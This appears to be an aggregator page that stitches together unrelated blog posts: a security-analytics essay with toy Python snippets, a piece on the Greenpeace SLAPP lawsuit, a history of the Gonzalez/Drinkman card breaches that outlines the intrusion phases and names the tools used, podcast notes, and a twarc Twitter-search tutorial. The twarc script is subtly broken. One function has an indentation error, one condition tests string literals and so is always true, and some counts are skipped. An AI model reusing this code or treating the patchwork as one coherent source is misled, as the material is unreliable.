Much of the threat intel available today is focused on data to be pumped into traditional controls, such as SIEM and egress filters. There is an emerging need for intel on new areas of exposure including the cloud, IoT, and mobility. As more attacks leverage these new attack vectors, more data becomes available, making us all better. But in the meantime there is a clear gap in the data available to feed these emerging technologies.

Yet effectively leveraging threat intel alone cannot realize the full potential of Security Decision Support. Knowing what could happen is very helpful. But you still end up with a long list of stuff to triage and potentially remediate, and little real context to prioritize those efforts. That’s where analytics comes in.

Analytics Identifies What Is Happening

The SIEM has historically been algorithmically challenged because its correlation engine was designed to alert on activity you knew to look for. It doesn’t help much with stuff you haven’t seen. Thus, as happens in markets like security, new approaches emerged to fill the gaps in incumbent technologies. Security analytics is a case in point.

Security analytics is conceptually simple. Use advanced math to establish a baseline of activity in the mass of collected security data. Then look for situations which could indicate malicious activity or misuse of critical systems or data. In reality, of course, it’s anything but simple.

The basic technology underlying security analytics tools is anomaly detection. You remember that, right? Security analytics vendors come up with fancy terms, but at its core this isn’t new. We have been looking for anomalies in our security data for over a decade. Remember Network-Based Anomaly Detection (NBAD)? We certainly do (being security historians and all) and that was the first “security analytics” offering we remember.

To be clear, NBAD worked and still does. The technology has been wrapped up into a variety of different offerings so there aren’t really stand-alone NBAD companies anymore, but the approach has evolved and morphed into what we now call security analytics. So what’s different now? First, you can analyze a lot more data, a lot more efficiently. Instead of just looking at network flow records (like in the NBAD days), you can now look at detailed network packet data, endpoint telemetry, log activity from pretty much all devices and applications in use, and even potentially transaction data, and then build a baseline to learn what is normal activity in your environment.
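
To make the concept concrete, here is a toy illustration of a baseline-and-outlier check. The numbers and the z-score threshold are arbitrary, and real analytics products use far richer models across many more data sources:

import statistics

# Hypothetical daily outbound traffic for one host (in MB), gathered during a quiet period
baseline = [120, 132, 118, 125, 140, 128, 122, 135, 130, 127]

mean = statistics.mean(baseline)
stdev = statistics.stdev(baseline)

def is_anomalous(observation, threshold=3.0):
  # Flag anything more than `threshold` standard deviations from the baseline mean
  return abs(observation - mean) / stdev > threshold

print(is_anomalous(131))   # False -- within normal variation
print(is_anomalous(2400))  # True -- possible exfiltration, worth investigating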

Most enterprise networks are pretty complicated (and getting more so), so building a baseline across a number of seemingly unrelated security data sources is challenging. To simplify things a bit, you can chunk the universe of activity into a manageable set of use cases, which gives you a reasonable place to start.

For example you might want to find compromised devices. One way to do that is to look for devices doing strange things which could indicate misuse. Typically someone in Finance shouldn’t be reconnoitering devices in Engineering. Or vice-versa. That’s not normal, and as such should probably be investigated. So paying attention to device behavior to detect malware is a common use for security analytics.

Along with device behavior, you could also expand the purview of analysis to include broader insider threats by building a baseline for how specific employees use their devices (called User Behavior Analytics: UBA). Then when an employee does something funky, like connecting to the finance system from a tablet at home, you can flag that as something to look at.
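
A crude sketch of that kind of per-user baseline follows. The field names and the "never seen this combination before" rule are mine, purely for illustration:

# Baseline: (user, device type, system) combinations observed during a training period
baseline = {
  ("asmith", "corporate_laptop", "finance_app"),
  ("asmith", "corporate_laptop", "email"),
  ("asmith", "personal_tablet", "email"),
}

def unusual_access(user, device_type, system):
  # Flag combinations this user has never exhibited before
  return (user, device_type, system) not in baseline

print(unusual_access("asmith", "corporate_laptop", "finance_app"))  # False -- normal
print(unusual_access("asmith", "personal_tablet", "finance_app"))   # True -- worth a look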

You could extend that use case to broader analysis by adding data from physical access systems (to see when an employee is in the office), as well as HR records (say, an employee under investigation or considered a flight risk). Or you could look at employee usage of specific applications, especially the ones accessing critical proprietary corporate data. From all this data you can profile employee usage and transaction patterns, providing a baseline to help identify activity which should be investigated.

Security analytics provides you not with a list of things to look for (like threat intel or threat modeling), but a list of things happening in your environment, providing more actionable alerts which likely warrant investigation.

Yet security analytics on its own also doesn’t rise to the standard of Security Decision Support. The analytics can identify things you need to look for, but you still don’t have a sense of importance or prioritization relative to the other things the analytics platform is alerting on. So we need to ask a few more questions of the system to understand how to make better decisions.

Driving Security Decisions

Now that you have an understanding of which attacks are being used in the wild (via threat intel) and which systems/users/applications are potentially being misused, the next step is to use that context to drive action. But what action? How do you prioritize all the things (both internal and external) that should be looked at? You need to balance the following to effectively decide which actions will be most impactful in your environment:

  • Asset/Data Value: There are corporate systems and data which are important to your company. When this kind of stuff is compromised, heads roll – probably yours. So obviously you are going to prioritize potential situations involving these systems or users above others. This is a subjective measure of value, so it requires a bunch of discussion with senior management to understand the values of various systems. But if you want to stay employed you need to factor asset value into the mix – you don’t have the resources or time to do everything.
  • Confidence: False positives hurt you by wasting time on stuff which turns out to be nothing. Reducing this wasted time is possible by tracking the confidence you have in your data/intel sources and analytical techniques. Obviously if a specific intel source sends you crap, you should not jump when it alerts. Likewise if a bunch of alerts based on a user’s mobile activity turn out to be much ado about nothing, you should de-emphasize that source over time. Yet if you do find something via retrospective search that indicates an attack, that should be high-priority since you know the attack is legitimate and happening in your environment.
  • Internal Skills/Resources: The industry is making progress at automating some security activities, but there still seems to be an infinite amount of work to do. You also need to consider the skills at your disposal to prioritize. If you are weak at Tier 1 response because your front-line staffers keep getting poached by consulting firms, you may want to send alerts that might be urgent directly to Tier 2. Similarly, if you know your Tier 3 folks get into deep water on file-less attacks, you may want to just quarantine those devices until your external forensics team can take a look.

This kind of process requires the ability to measure effectiveness of both threat intel and analytics over time. A gut feel isn’t the best tool to determine which sources work best. The sooner you start quantifying value the better. Not just for better prioritization but also to save money. If you are spending money on sources or analytics platforms which don’t provide value, stop.
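
One way to start quantifying this is a simple composite score over the three factors above. This is a back-of-the-envelope sketch, not a formula from any particular product:

# Each alert carries: asset value (agreed with management), source confidence
# (tracked over time), and whether current staff can handle it in-house
alerts = [
  {"id": "A-1", "asset_value": 9, "source_confidence": 0.4, "skills_available": True},
  {"id": "A-2", "asset_value": 5, "source_confidence": 0.9, "skills_available": True},
  {"id": "A-3", "asset_value": 8, "source_confidence": 0.8, "skills_available": False},
]

def priority(alert):
  score = alert["asset_value"] * alert["source_confidence"]
  # Alerts we can't handle internally get bumped so they are routed out early
  if not alert["skills_available"]:
    score *= 1.5
  return score

for alert in sorted(alerts, key=priority, reverse=True):
  print(alert["id"], round(priority(alert), 2))

Even a crude score like this forces the conversation about asset values and source quality, which is most of the battle.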

By leveraging threat intel and more advanced security analytics, we have narrowed the aperture of all the things you could look at, to help identify what you need to look at. We won’t claim this makes your to-do list manageable, but every bit helps. By focusing on likely attacks (according to threat intel) on devices which are acting abnormally, while considering the value of the asset being attacked and your confidence in the data, it’s far more likely you will focus on the attacks which matter.

This is what Security Decision Support is all about: enabling you to make the best use of your available resources by working smarter, leveraging technology and external resources to improve the effectiveness of your security team.

To wrap up this series our next post will focus on how better and more contextual alerts can favorably impact security operations, and which integrations are required to make that vision a reality.

- Mike Rothman

Dangerous lawsuit against Greenpeace threatens news organizations and First Amendment


A harrowing lawsuit poses a serious threat to the First Amendment and press freedom, but it isn’t coming from legal action against a newspaper. Instead, it originates from legal action against environmental advocacy organizations.

Last year, Greenpeace—along with countless other environmental and human rights groups—reported on and advocated against the construction of the Dakota Access Pipeline due to environmental and human and indigenous rights concerns. In response, a company behind DAPL, Energy Transfer Partners (ETP), is suing Greenpeace, along with small Dutch organization BankTrack.

The lawsuit also names Earth First!, which it calls a “radical eco-terrorist group.” But because Earth First! is not an organization but rather an environmental movement and idea, the legal complaint was mailed to a small environmental news publication called the Earth First! Journal.

Filed last August, the $900 million lawsuit accuses them of defamation and racketeering, and essentially calls them a criminal enterprise. On February 8, ETP filed its opposition memo to Greenpeace’s motion to dismiss the lawsuit, but the organizations continue to fight to have it dismissed.

When we talk about censorship, we often center government actors. But increasingly serious threats to advocacy and free expression are also being brought by corporations. Lawsuits like ETP’s against Greenpeace—called strategic lawsuits against public participation (SLAPP)—are a kind of privatized censorship. As their name implies, SLAPP lawsuits are a tool used by corporations to silence critics and First Amendment-protected speech. They are often filed not because the plaintiff thinks they can win, but to harass and bleed the defendant of funds, and hopefully make them think twice about public criticism in the future.

In the suit, ETP alleges that the defendants engaged in a criminal conspiracy to defame the company. ETP further claims that Greenpeace ran a media campaign that aimed to cut the company’s profits through its criticism and its campaign for divestment from the company, and that Greenpeace therefore should be punished. As the ACLU wrote, if ETP’s theory were adopted by courts, “Public campaigns, routine fundraising appeals, conversations with allies, and vindication of legal rights in court could all be targeted.”

Outrageously, ETP is attempting to hold Greenpeace responsible for acts such as property destruction committed by completely unaffiliated groups and individuals simply because they advocated against the construction of a pipeline. Greenpeace is not even alleged to have done anything violent themselves.

“ETP’s theory would deter speech and association related to any issue that might provoke various forms of protest, that is to say, almost any controversial matter of public import about which people hold passionate views—the decision to go to war, the barring of immigrants from certain nations, the boundaries of police officers’ actions, the legality of abortion, and the tension between federal authority and local control, to name just a few,” the ACLU wrote in its amicus brief strongly opposing the lawsuit.

The press freedom implications of this claim are chilling. Say a news organization like the Washington Post publishes a story about activists boycotting internet service providers that refuse to treat digital content neutrally. Under this legal theory, internet service providers could conceivably sue the Washington Post and try to hold it responsible for the actions of unaffiliated individuals or groups because they read the story and took independent action.

ETP’s lawsuit is especially concerning because it also claims violations under the Racketeer Influenced and Corrupt Organizations Act (RICO), a sweeping law originally intended to address organized crime like the mafia. It provides for extended penalties for acts performed as part of an alleged “criminal enterprise,” and it also prescribes damages of triple the amount claimed by the plaintiff.

Parties that bring SLAPP lawsuits don’t necessarily aim to win — instead, the suits are designed to intimidate their targets into silence on issues of public significance. Even filing such a suit drains its targets of energy and resources, diverting staff time that would have been spent on advocacy work into drawn-out litigation. BankTrack, one of the defendants in the ETP lawsuit, doesn’t have libel insurance, and because it’s based in the Netherlands, insurance would be unlikely to help with lawsuits filed in the United States. Corporations attempt to inhibit political advocacy work by making fighting the suit in court so overwhelmingly expensive that organizations abandon their position or risk their very survival.

Greenpeace, thankfully, refuses to bow to intimidation. Tom Wetterer, General Counsel for Greenpeace USA, told the Freedom of the Press Foundation that the lawsuit has only underscored the importance of Greenpeace’s work and emboldened the organization to fight even harder for environmental and human rights.

This isn’t the first time Greenpeace has been targeted by corporations in SLAPP suits. The year before the ETP lawsuit, in May 2016, logging company Resolute Forest Products filed a similar RICO SLAPP suit in which Greenpeace is also a defendant. It likewise alleged that Greenpeace’s campaigns against logging amounted to a criminal enterprise, suing the nonprofit for approximately $300 million. While this suit was dismissed in October 2017 after a judge found that Resolute had not made proper legal claims, the company has amended its complaint and the case might not resolve for many months.

When the Resolute case was dismissed, Greenpeace executive director Annie Leonard wrote, “If it had won, Greenpeace USA would likely have been forced to close its doors.” These lawsuits could not just silence but shut down organizations completely, chilling their crucial advocacy work.

Resolute Forest Products is North America’s largest newsprint producer. While newspapers across the country are doing important work of publishing the news and keeping the public informed, they are doing so on materials produced by a company attempting to silence free expression.

Donald Trump’s former law firm, Kasowitz and Benson Torres LLC, is representing both Resolute and ETP in the suits.

It’s difficult to overstate the implications of these lawsuits for journalism. While Greenpeace isn’t a news organization, this type of legal action has huge implications for news organizations as well. Corporations’ use of defamation lawsuits as a tool for draining the resources of organizations that publish critical speech is, disturbingly, increasingly frequent.

Billionaire Peter Thiel famously bankrolled a series of lawsuits against Gawker, contributing to the publication’s declaration of bankruptcy and eventual demise. After TechDirt published articles critical of businessman Shiva Ayyadurai, he sued the publication and its founder. The same attorney, Charles Harder, represented both plaintiffs. Last June, Sarah Palin filed a lawsuit against the New York Times, ultimately dismissed, alleging that an editorial mistake amounted to defamation. These are just a few of many recent examples.

From news organizations to nonprofits, those that seek to hold the powerful to account are all too often hit by these lawsuits that drain them of resources and attempt to deflate their work.

SLAPP lawsuits are baseless attempts to mischaracterize constitutionally protected speech and criminalize legitimate political protest, and the suit against Greenpeace should be dismissed immediately. These lawsuits are intended to intimidate critics into silence, and pose a fundamental threat to any advocacy that challenges the powerful.

Drinkman and Smilianets Sentenced: The End to Our Longest Databreach Saga?

On Thursday, February 15, 2018, we may have finally reached the end of the Albert Gonzalez Databreach Saga. Vladimir Drinkman, age 37, was sentenced to 144 months in prison, after pleading guilty before U.S. District Judge Jerome Simandle in New Jersey. His colleague, Dmitriy Smilianets, age 34, had also pleaded guilty and was sentenced to 51 months and 21 days in prison (which is basically "time served", so he'll walk immediately). The pair were actually arrested in the Netherlands on June 28, 2012, and the guilty pleas came in September 2015 after they were extradited to New Jersey.

Those who follow data breaches will certainly be familiar with Albert Gonzalez, but may not realize how far back his criminal career goes.

On July 24, 2003, the NYPD arrested Gonzalez in front of a Chase Bank ATM at 2219 Broadway and found him in possession of 15 counterfeit Chase ATM cards and $3,000 in cash. (See case 1:09-cr-00626-JBS.) After that arrest, Gonzalez was taken under the wing of a pair of Secret Service agents, David Esposito and Steve Ward. Gonzalez describes some of the activities he engaged in during his time as a confidential informant (CI) in the 53-page appeal he filed on March 24, 2011 from his prison cell in Milan, Michigan.

At one point, he claims that he explained to Agent Ward that he owed a Russian criminal $5,000 and he couldn't afford to pay it.  According to his appeal, he claims Ward told him to "Go do your thing, just don't get caught" and that Agent Ward later asked him if he had "handled it." Because of this, Gonzalez (who again, according to his own sentencing memo, likely has Asperger's) claims he believed that he had permission to hack, as long as he didn't get caught.

Over Christmas 2007, Gonzalez and his crew hacked Heartland Payment Systems and stole around 130 million credit and debit cards. He was also charged with hacking 7-Eleven (August 2007) and Hannaford Brothers (November 2007), where he stole 4.2 million credit and debit cards. Two additional data breaches, against "Company A" and "Company B," were also listed. Gonzalez's indictment refers to "HACKER 1 who resided in or near Russia" and "HACKER 2 who resided in or near Russia." Another co-conspirator, "PT," was later identified as Patrick Toey, a resident of Virginia Beach, VA. (Patrick Toey's sentencing memorandum is a fascinating document that describes his first "cash out trip" working for Albert Gonzalez in 2003. Toey describes being a high-school dropout who smoked marijuana and drank heavily and was "put on a bus to New York" by his mother to do the cash out run because she needed rent money. Toey later moved in with Gonzalez in Miami, where he describes hacking Forever 21 "for Gonzalez," among other hacks.)

Gonzalez's extracurricular activities caught up with him when Maksym Yastremskiy (AKA Maksik) was arrested in Turkey. Another point of Gonzalez's appeal was that Maksik was tortured by Turkish police, and that without said torture he never would have confessed, which would have meant that Gonzalez (then acting online as "Segvec") would never have been identified or arrested. Gonzalez claims that he suffered from an inadequate defense, because his lawyer should have objected to the evidence "obtained under torture." These charges against Gonzalez were tried in the Eastern District of New York (2:08-cr-00160-SJF-AKT) and proved that Gonzalez was part of the Dave & Buster's data breach.

On December 15, 2009, Gonzalez tried to shrug off some of his federal charges by filing a sentencing memo claiming that he lacked the "capacity to knowingly evaluate the wrongfulness of his actions" and asserting that his criminal behavior "was consistent with description of the Asperger's disorder" and that he exhibited characteristics of "Internet addiction." Two weeks later, after arguing that the court could not conduct its own psychological exam, Gonzalez signed a guilty plea, with the understanding that the prosecutor would try to limit his sentence to 17 years. He is currently imprisoned in Yazoo, Mississippi (FBOP # 25702-050), scheduled to be released October 29, 2025.

Eventually "HACKER 1" and "HACKER 2" were indicted themselves in April 2012, with an arrest warrant issued in July 2012, but due to criminals still at large, the indictment was not unsealed until December 18, 2013. HACKER 1 was Drinkman.  HACKER 2 was Alexandr Kalinin, who was also indicted with Drinkman and Smilianets.

Shortly after the Target Data Breach, I created a presentation called "Target Data Breach: Lessons Learned" which drew heavily on the history of Drinkman and Smilianets. Some of their documented data breaches included:
Victim                     Date                 Damages
NASDAQ                     May 2007             loss of control
7-Eleven                   August 2007
Carrefour                  October 2007         2 million cards
JCPenney                   October 2007
Hannaford                  November 2007        4.2 million cards
Wet Seal                   January 2008
Commidea                   November 2008        30 million cards
Dexia Bank Belgium         Feb '08 - Feb '09
JetBlue                    Jan '08 - Feb '11
Dow Jones                  2009
EuroNet                    Jul '10 - Oct '11    2 million cards
Visa Jordan                Feb - Mar '11        800,000 cards
Global Payments Systems    Jan '11 - Mar '12
Diners Club Singapore      Jun '11
Ingenicard                 Mar '12 - Dec '12
During the time of these attacks, Dmitriy Smilianets was also a leading figure in the video game world. His team, The Moscow 5, were the Intel Extreme Masters champions in the first League of Legends championship, also placing in the Counter-Strike category. Smilianets turned out not to be the hacker; rather, he specialized in selling the credit cards that the other team members stole. Steal a few hundred million credit cards and you can buy a nice gaming rig!

Smilianets with his World Champion League of Legends team in 2012

How did these data breaches work?


Lockheed Martin's famous paper "Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains" laid out the phases of an attack like this:

But my friend Daniel Clemens had explained these same phases to me years before, when he was teaching me the basics of penetration testing as he was first starting Packet Ninjas!

1. External Recon - Gonzalez and his crew scan for Internet-facing SQL servers
2. Attack (Dan calls this "Establishing a Foothold") - using common SQL configuration weaknesses, they caused a set of additional tools to be downloaded from the Internet
3. Internal Recon - these tools included a Password Dumper, Password Cracker, Port Scanner,  and tools for bulk exporting data
4. Expand (Dan calls this "Creating a Stronghold") - usually this consisted of monitoring the network until they found a Domain Admin userid and password. (For example, in the Heartland Payment Systems attack, the VERITAS userid was found to have the password "BACKUP," which unlocked every server on the network!)
5. Dominate - Gonzalez's crew would then schedule an SQL script to run a nightly dump of their card data
6. Exfiltrate - data sent to remote servers via an outbound FTP.

In Rolling Stone, Gonzalez claims he compromised more than 250 networks
The Rolling Stone article, "Sex, Drugs, and the Biggest Cybercrime of All Time," also describes Steven Watt, who was charged in Massachusetts in October 2008 for providing attack tools to Gonzalez. Watt's tools were used in breaches including BJ's Wholesale Club, Boston Market, Barnes & Noble, Sports Authority, Forever 21, DSW, and OfficeMax. As part of his sentencing, Watt was ordered to repay $171.5 million.

Almost all of those data breaches followed the same model: scan, SQL inject, download tools, plant a foothold, convert it to a stronghold by becoming a domain admin, dominate the network, and exfiltrate the data.

How did the Target data breach happen, by the way? Target is still listed as being "unsolved" ... but let's review. An SQL injection led to downloaded tools (including NetCat, PsExec, QuarksPWDump, ElcomSoft's Proactive Password Auditor, SomarSoft's DumpSec, Angry IP Scanner for finding database servers, and Microsoft's OSQL and BCP (Bulk Copy)), a Domain Admin password was found (in Target's case, a BMC server monitoring tool running the default password), the POS malware was installed, and data exfiltration began.

Sound familiar???

Justice?

With most of Gonzalez's crew in prison by 2010, the data breaches kept right on coming, thanks to Drinkman and Smilianets. 

Drinkman, the hacker, was sentenced to 144 months in prison.
Smilianets, the card broker, was sentenced to 51 months and 21 days, which amounts to "time served" -- he was extradited to the US on September 7, 2012, so he'll walk.

Will Smilianets return to video gaming? to money laundering? or perhaps choose to go straight?

Meanwhile, Alexandr Kalinin, of St. Petersburg, Russia; Mikhail Rytikov, of Odessa, Ukraine; and Roman Kotov, of Moscow, Russia, are all still at large. Have they learned from the fate of their co-conspirators? Or are they, in all likelihood, scanning networks for SQL servers, injecting them, dropping tools, planting footholds, creating strongholds, and exfiltrating credit card data from American companies every day?

Kalinin (AKA Grig, AKA "g", AKA "tempo") is wanted for hacking NASDAQ and planting malware that ran on the NASDAQ networks from 2008 to 2010.  (See the indictment in the Southern District of New York, filed 24JUL2013 ==> 1:13-cr-00548-ALC )

Mykhailo Sergiyovych Rytikov is wanted in the Western District of Pennsylvania for his role in a major Zeus malware case.  Rytikov leased servers to other malware operators.  Rytikov is also indicted in the Eastern District of Virginia along with Andriy DERKACH for running a "Dumps Checking Service" that processed at least 1.8 million credit cards in the first half of 2009 and that directly led to more than $12M in fraud.  ( 1:12-cr-00522-AJT filed 08AUG2013.)  Rytikov did have a New York attorney presenting a defense in the case -- Arkady Bukh argues that while Rytikov is definitely involved in web-hosting, he isn't responsible for what happens on the websites he hosts.

Roman Kotov, along with Rytikov and Kalinin, is still wanted in New Jersey as part of case 1:09-cr-00626-JBS (Chief Judge Jerome B. Simandle). This is the same case under which Drinkman and Smilianets were just sentenced.

It’s Just Beautiful – Application Security Weekly #06

This week, Keith and Paul discuss Data Security and Bug Bounty programs! In the news, Lenovo warns of critical Wifi vulnerability, Russian nuclear scientists arrested for Bitcoin mining plot, remote workers outperforming office workers, and more on this episode of Application Security Weekly!

 

Full Show Notes: https://wiki.securityweekly.com/ASW_Episode06

 

Visit https://www.securityweekly.com/asw for all the latest episodes!

Searching Twitter With Twarc

Twarc makes it really easy to search Twitter via the API. Simply create a twarc object using your own API keys and then pass your search query into twarc’s search() function to get a stream of Tweet objects. Remember that, by default, the Twitter API will only return results from the last 7 days. However, this is useful enough if we’re looking for fresh information on a topic.
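
As a minimal sketch (with placeholder credentials you would replace with your own), the basic search loop looks something like this:

from twarc import Twarc

# Replace these placeholders with your own Twitter API credentials
consumer_key = ""
consumer_secret = ""
access_token = ""
access_token_secret = ""

twarc = Twarc(consumer_key, consumer_secret, access_token, access_token_secret)

# search() yields one decoded Tweet object (a dict) at a time and handles
# pagination and rate limiting for us
for tweet in twarc.search("pytorch"):
  # Extended tweets carry their text in "full_text"; older-style ones use "text"
  print(tweet.get("full_text", tweet.get("text", "")))

Everything below builds on that loop.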

Since this methodology is so simple, posting code for a tool that simply prints the resulting tweets to stdout would make for a boring blog post. Here I present a tool that collects a bunch of metadata from the returned Tweet objects. Here’s what it does:

  • records frequency distributions of URLs, hashtags, and users
  • records interactions between users and hashtags
  • outputs csv files that can be imported into Gephi for graphing
  • downloads all images found in Tweets
  • records each Tweet’s text along with the URL of the Tweet

The code doesn’t really need explanation, so here’s the whole thing.

from collections import Counter
from itertools import combinations
from twarc import Twarc
import requests
import sys
import os
import shutil
import io
import re
import json

# Helper functions for saving json, csv and formatted txt files
def save_json(variable, filename):
  with io.open(filename, "w", encoding="utf-8") as f:
    f.write(unicode(json.dumps(variable, indent=4, ensure_ascii=False)))

def save_csv(data, filename):
  with io.open(filename, "w", encoding="utf-8") as handle:
    handle.write(u"Source,Target,Weight\n")
    for source, targets in sorted(data.items()):
      for target, count in sorted(targets.items()):
        if source != target and source is not None and target is not None:
          handle.write(source + u"," + target + u"," + unicode(count) + u"\n")

def save_text(data, filename):
  with io.open(filename, "w", encoding="utf-8") as handle:
    for item, count in data.most_common():
      handle.write(unicode(count) + "\t" + item + "\n")

# Returns the screen_name of the user retweeted, or None
def retweeted_user(status):
  if "retweeted_status" in status:
    orig_tweet = status["retweeted_status"]
    if "user" in orig_tweet and orig_tweet["user"] is not None:
      user = orig_tweet["user"]
      if "screen_name" in user and user["screen_name"] is not None:
        return user["screen_name"]

# Returns a list of screen_names that the user interacted with in this Tweet
def get_interactions(status):
  interactions = []
  if "in_reply_to_screen_name" in status:
    replied_to = status["in_reply_to_screen_name"]
    if replied_to is not None and replied_to not in interactions:
      interactions.append(replied_to)
  if "retweeted_status" in status:
    orig_tweet = status["retweeted_status"]
    if "user" in orig_tweet and orig_tweet["user"] is not None:
      user = orig_tweet["user"]
      if "screen_name" in user and user["screen_name"] is not None:
        if user["screen_name"] not in interactions:
          interactions.append(user["screen_name"])
  if "quoted_status" in status:
    orig_tweet = status["quoted_status"]
    if "user" in orig_tweet and orig_tweet["user"] is not None:
      user = orig_tweet["user"]
      if "screen_name" in user and user["screen_name"] is not None:
        if user["screen_name"] not in interactions:
          interactions.append(user["screen_name"])
  if "entities" in status:
    entities = status["entities"]
    if "user_mentions" in entities:
      for item in entities["user_mentions"]:
        if item is not None and "screen_name" in item:
          mention = item['screen_name']
          if mention is not None and mention not in interactions:
            interactions.append(mention)
  return interactions

# Returns a list of hashtags found in the tweet
def get_hashtags(status):
  hashtags = []
  if "entities" in status:
    entities = status["entities"]
    if "hashtags" in entities:
      for item in entities["hashtags"]:
        if item is not None and "text" in item:
          hashtag = item['text']
          if hashtag is not None and hashtag not in hashtags:
            hashtags.append(hashtag)
  return hashtags

# Returns a list of URLs found in the Tweet
def get_urls(status):
  urls = []
  if "entities" in status:
    entities = status["entities"]
      if "urls" in entities:
        for item in entities["urls"]:
          if item is not None and "expanded_url" in item:
            url = item['expanded_url']
            if url is not None and url not in urls:
              urls.append(url)
  return urls

# Returns the URLs to any images found in the Tweet
def get_image_urls(status):
  urls = []
  if "entities" in status:
    entities = status["entities"]
    if "media" in entities:
      for item in entities["media"]:
        if item is not None:
          if "media_url" in item:
            murl = item["media_url"]
            if murl not in urls:
              urls.append(murl)
  return urls

# Main starts here
if __name__ == '__main__':
# Add your own API key values here
  consumer_key=""
  consumer_secret=""
  access_token=""
  access_token_secret=""

  twarc = Twarc(consumer_key, consumer_secret, access_token, access_token_secret)

# Check that search terms were provided at the command line
  target_list = []
  if (len(sys.argv) > 1):
    target_list = sys.argv[1:]
  else:
    print("No search terms provided. Exiting.")
    sys.exit(0)

  num_targets = len(target_list)
  for count, target in enumerate(target_list):
    print(str(count + 1) + "/" + str(num_targets) + " searching on target: " + target)
# Create a separate save directory for each search query
# Since search queries can be a whole sentence, we'll check the length
# and simply number it if the query is overly long
    save_dir = ""
    if len(target) < 30:
      save_dir = target.replace(" ", "_")
    else:
      save_dir = "target_" + str(count + 1)
    if not os.path.exists(save_dir):
      print("Creating directory: " + save_dir)
      os.makedirs(save_dir)
# Variables for capturing stuff
    tweets_captured = 0
    influencer_frequency_dist = Counter()
    mentioned_frequency_dist = Counter()
    hashtag_frequency_dist = Counter()
    url_frequency_dist = Counter()
    user_user_graph = {}
    user_hashtag_graph = {}
    hashtag_hashtag_graph = {}
    all_image_urls = []
    tweets = {}
    tweet_count = 0
# Start the search
    for status in twarc.search(target):
# Output some status as we go, so we know something is happening
      sys.stdout.write("\r")
      sys.stdout.flush()
      sys.stdout.write("Collected " + str(tweet_count) + " tweets.")
      sys.stdout.flush()
      tweet_count += 1
    
      screen_name = None
      if "user" in status:
        if "screen_name" in status["user"]:
          screen_name = status["user"]["screen_name"]

      retweeted = retweeted_user(status)
      if retweeted is not None:
        influencer_frequency_dist[retweeted] += 1
      else:
        influencer_frequency_dist[screen_name] += 1

# Tweet text can be in either "text" or "full_text" field...
      text = None
      if "full_text" in status:
        text = status["full_text"]
      elif "text" in status:
        text = status["text"]

      id_str = None
      if "id_str" in status:
        id_str = status["id_str"]

# Assemble the URL to the tweet we received...
      tweet_url = None
      if "id_str" is not None and "screen_name" is not None:
        tweet_url = "https://twitter.com/" + screen_name + "/status/" + id_str

# ...and capture it
      if tweet_url is not None and text is not None:
        tweets[tweet_url] = text

# Record mapping graph between users
      interactions = get_interactions(status)
      if interactions is not None:
        for user in interactions:
          mentioned_frequency_dist[user] += 1
          if screen_name not in user_user_graph:
            user_user_graph[screen_name] = {}
          if user not in user_user_graph[screen_name]:
            user_user_graph[screen_name][user] = 1
          else:
            user_user_graph[screen_name][user] += 1

# Record mapping graph between users and hashtags
      hashtags = get_hashtags(status)
      if hashtags is not None:
        if len(hashtags) > 1:
          hashtag_interactions = []
# This code creates pairs of hashtags in situations where multiple
# hashtags were found in a tweet
# This is used to create a graph of hashtag-hashtag interactions
          for comb in combinations(sorted(hashtags), 2):
            hashtag_interactions.append(comb)
          if len(hashtag_interactions) > 0:
            for inter in hashtag_interactions:
              item1, item2 = inter
              if item1 not in hashtag_hashtag_graph:
                hashtag_hashtag_graph[item1] = {}
              if item2 not in hashtag_hashtag_graph[item1]:
                hashtag_hashtag_graph[item1][item2] = 1
              else:
                hashtag_hashtag_graph[item1][item2] += 1
          for hashtag in hashtags:
            hashtag_frequency_dist[hashtag] += 1
            if screen_name not in user_hashtag_graph:
              user_hashtag_graph[screen_name] = {}
            if hashtag not in user_hashtag_graph[screen_name]:
              user_hashtag_graph[screen_name][hashtag] = 1
            else:
              user_hashtag_graph[screen_name][hashtag] += 1

      urls = get_urls(status)
      if urls is not None:
        for url in urls:
          url_frequency_dist[url] += 1

      image_urls = get_image_urls(status)
      if image_urls is not None:
        for url in image_urls:
          if url not in all_image_urls:
            all_image_urls.append(url)

# Once the search for this target is finished, fetch each image we haven't already downloaded
    print("")
    print("Fetching images.")
    pictures_dir = os.path.join(save_dir, "images")
    if not os.path.exists(pictures_dir):
      print("Creating directory: " + pictures_dir)
      os.makedirs(pictures_dir)
    for url in all_image_urls:
      m = re.search("^http:\/\/pbs\.twimg\.com\/media\/(.+)$", url)
      if m is not None:
        filename = m.group(1)
        print("Getting picture from: " + url)
        save_path = os.path.join(pictures_dir, filename)
        if not os.path.exists(save_path):
          response = requests.get(url, stream=True)
          with open(save_path, 'wb') as out_file:
            shutil.copyfileobj(response.raw, out_file)
          del response

# Output a bunch of files containing the data we just gathered
    print("Saving data.")
    json_outputs = {"tweets.json": tweets,
                    "urls.json": url_frequency_dist,
                    "hashtags.json": hashtag_frequency_dist,
                    "influencers.json": influencer_frequency_dist,
                    "mentioned.json": mentioned_frequency_dist,
                    "user_user_graph.json": user_user_graph,
                    "user_hashtag_graph.json": user_hashtag_graph,
                    "hashtag_hashtag_graph.json": hashtag_hashtag_graph}
    for name, dataset in json_outputs.iteritems():
      filename = os.path.join(save_dir, name)
      save_json(dataset, filename)

# These files are created in a format that can be easily imported into Gephi
    csv_outputs = {"user_user_graph.csv": user_user_graph,
                   "user_hashtag_graph.csv": user_hashtag_graph,
                   "hashtag_hashtag_graph.csv": hashtag_hashtag_graph}
    for name, dataset in csv_outputs.iteritems():
      filename = os.path.join(save_dir, name)
      save_csv(dataset, filename)

    text_outputs = {"hashtags.txt": hashtag_frequency_dist,
                    "influencers.txt": influencer_frequency_dist,
                    "mentioned.txt": mentioned_frequency_dist,
                    "urls.txt": url_frequency_dist}
    for name, dataset in text_outputs.iteritems():
      filename = os.path.join(save_dir, name)
      save_text(dataset, filename)

Running this tool will create a directory for each search term provided at the command-line. To search for a sentence, or to include multiple terms, enclose the argument with quotes. Due to Twitter’s rate limiting, your search may hit a limit, and need to pause to wait for the rate limit to reset. Luckily twarc takes care of that. Once the search is finished, a bunch of files will be written to the previously created directory.
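
For example, assuming you saved the script as twarc_search.py (that filename is mine, not part of the tool), a run against two queries might look like this:

python twarc_search.py pytorch "deep learning"

This would create pytorch/ and deep_learning/ directories, each containing the json, csv, and txt outputs plus an images/ subdirectory.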

Since I use a Mac, I can use its Quick Look functionality from the Finder to browse the output files created. Because pytorch is gaining a lot of interest, I ran my script against that search term. Here are some examples of how I can quickly view the output files.

